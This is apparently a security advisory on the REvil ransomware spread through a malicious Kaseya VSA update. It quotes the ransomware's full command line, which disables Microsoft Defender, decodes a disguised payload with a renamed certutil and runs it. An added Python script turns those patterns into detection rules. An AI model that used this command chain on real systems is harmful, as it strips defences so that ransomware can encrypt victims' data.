Ransomware attack has major impact on companies


Currently there is a widespread, ongoing supply chain attack targeting MSPs that uses Kaseya VSA to distribute a version of the REvil ransomware onto customers' environments. At this time multiple MSPs have been hit as part of this. Kaseya VSA is both a cloud-based and an on-premises MSP platform used for patch management and client monitoring.

Kaseya has issued a security advisory urging customers running the on-premises solution to shut down their servers running VSA until further notice. It is critical that this is done as soon as possible, since one of the first things the ransomware does is disable administrative access to the VSA.

How it works

An automatic update was pushed to the product that included the REvil ransomware.

The ransomware starts off by running the following command:
“cmd.exe” /c ping -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

This severely cripples Microsoft Defender and disables functionality that would otherwise most likely have prevented the ransomware.

After that it decodes c:\kworking\agent.crt and extracts agent.exe, which contains the files MsMpEng.exe and mpsvc.dll. The first file is a legitimate version of Microsoft Defender and the second one is the REvil encryptor payload, which uses DLL sideloading to get loaded into the legitimate Windows Defender executable and, through that, encrypts the system.
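As an added example (not part of the original advisory and not Orange Cyberdefense or Kaseya code), the Python script below turns the behaviour described above into detection rules and runs them over a few constructed process-creation log lines. The log format, timestamps, hostnames and benign entries are assumptions made for illustration; the rules themselves match on the patterns in the quoted command line: Set-MpPreference switching protections off, certutil.exe being copied under another name, a random value appended to that copy, a -decode producing an executable, and execution out of the kworking directory.

```python
import re

# Detection rules derived from the command line quoted in the advisory.
# Case-insensitive because cmd.exe and PowerShell are.
RULES = {
    # Microsoft Defender protections being switched off via Set-MpPreference.
    "defender_tamper": re.compile(
        r"Set-MpPreference\b.*?-(DisableRealtimeMonitoring|DisableIOAVProtection|"
        r"DisableScriptScanning|DisableIntrusionPreventionSystem)\s+\$true",
        re.IGNORECASE,
    ),
    # certutil.exe copied to a new name (evades rules keyed on the original name).
    "certutil_copy": re.compile(r"copy\s+(/\w+\s+)*\S*certutil\.exe\s+\S+", re.IGNORECASE),
    # Any binary used with -decode to produce an .exe (certutil behaviour under a new name).
    "certutil_decode": re.compile(r"\b\w+\.exe\s+-decode\s+\S+\s+\S+\.exe", re.IGNORECASE),
    # Random bytes appended to an executable to change its hash.
    "hash_busting": re.compile(r"echo\s+%RANDOM%\s*>>\s*\S+\.exe", re.IGNORECASE),
    # Execution of a binary from the kworking directory named in the advisory.
    "kworking_exec": re.compile(r"[a-z]:\\kworking\\\S+\.exe", re.IGNORECASE),
}

# Constructed sample log (assumed key=value format, not a real Sysmon/EDR export).
SAMPLE_LOG = [
    # The chain from the advisory, recorded as a single process-creation entry.
    r'2021-07-02T14:01:05Z host=ws01 evt=ProcessCreate image=C:\Windows\System32\cmd.exe '
    r'cmdline="cmd.exe /c ping -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true -Force & '
    r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & '
    r'C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & c:\kworking\agent.exe"',
    # Benign: certutil used for its intended purpose.
    r'2021-07-02T14:01:09Z host=ws01 evt=ProcessCreate image=C:\Windows\System32\certutil.exe '
    r'cmdline="certutil.exe -verify C:\certs\corp-root.cer"',
    # Benign: an administrator turning real-time monitoring back on.
    r'2021-07-02T14:01:12Z host=ws02 evt=ProcessCreate image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'cmdline="powershell.exe Set-MpPreference -DisableRealtimeMonitoring $false"',
]


def classify(cmdline: str) -> list:
    """Return the names of every rule the log line triggers, in rule order."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def severity(matched: list) -> str:
    """Defender tampering combined with payload staging in one chain is the critical case."""
    if "defender_tamper" in matched and len(matched) > 1:
        return "critical"
    if matched:
        return "suspicious"
    return "none"


def scan(lines: list) -> list:
    """Scan log lines and return (line, matched_rules, severity) for every hit."""
    hits = []
    for line in lines:
        matched = classify(line)
        if matched:
            hits.append((line, matched, severity(matched)))
    return hits


if __name__ == "__main__":
    for line, matched, level in scan(SAMPLE_LOG):
        print(f"[{level}] {', '.join(matched)}")
        print(f"    {line[:120]}...")
```

Each rule is deliberately narrow enough that the two benign entries produce no hits; in a real deployment the same logic would run on process-creation telemetry (Sysmon Event ID 1 or an EDR equivalent), and a "critical" result, where Defender is tampered with and a payload is staged in the same command chain, is the signal to isolate the host rather than wait for the encryptor to run.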

Indicators of compromise



Orange Cyberdefense recommends immediately shutting down servers running Kaseya VSA and following further official updates from Kaseya.

REvil ransomware hits 200 companies in MSP supply-chain attack
REvil ransomware gang executes supply chain attack via malicious Kaseya update
Kaseya supply chain attack delivers mass ransomware event to US companies
